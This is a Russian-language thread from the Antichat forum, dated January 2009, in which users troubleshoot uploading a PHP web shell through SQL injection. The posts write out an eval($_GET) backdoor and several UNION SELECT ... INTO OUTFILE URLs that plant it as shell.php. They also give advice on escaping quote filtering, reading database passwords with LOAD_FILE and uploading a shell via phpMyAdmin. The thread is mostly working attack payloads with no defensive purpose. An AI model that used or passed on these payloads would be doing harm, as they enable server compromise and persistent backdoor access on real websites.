ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5021  
Старый 25.01.2009, 18:10
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

Цитата:
Сообщение от n0ne  
kevmen, "<?php eval($_GET['sql'])?>" или '<?php eval($_GET["sql"])?>' или '<?php eval($_GET[sql])?>' и т.д.
бесполезно,не получается
 
Ответить с цитированием

  #5022  
Старый 25.01.2009, 18:12
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Закодируй в 16битный формат вида 0xHEX_CODE...
 
Ответить с цитированием

  #5023  
Старый 25.01.2009, 18:15
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f47455 45b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+0x5a3 a5c7368656c6c2e706870

тоже не помогает
 
Ответить с цитированием

  #5024  
Старый 25.01.2009, 18:17
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

INTO+OUTFILE+'Z:\shell.php' нельзя хексить..

Пробуй:

Код:
http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f4745545b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\shell.php'

Последний раз редактировалось R1dex; 25.01.2009 в 18:20..
 
Ответить с цитированием

  #5025  
Старый 25.01.2009, 18:21
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Убери с оутфайла хекс,если не поможет, значит вероятно фильтрация кавычек в запросе...
 
Ответить с цитированием

  #5026  
Старый 25.01.2009, 18:32
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f47455 45b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\s hell.php'

пробовал так,бесполезно все!
 
Ответить с цитированием

  #5027  
Старый 25.01.2009, 18:32
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

'Z:\shell.php'
вот это нужно как-то приподнести без кавычек)
 
Ответить с цитированием

  #5028  
Старый 25.01.2009, 18:37
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Где то была инфа по обходу фильтрации кавычек, но будет она пахать в даном случае-хз...
 
Ответить с цитированием

  #5029  
Старый 25.01.2009, 18:43
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от kevmen  
'Z:\shell.php'
вот это нужно как-то приподнести без кавычек)
Кавычки должны быть и обязательно "настоящими"
 
Ответить с цитированием

  #5030  
Старый 25.01.2009, 18:46
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Если тебя интересует заливка шелла, то при наличии прав с помощью лоад файла можно узнать пассы от бд и попытатся залить шелл через пхпмайадмин...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ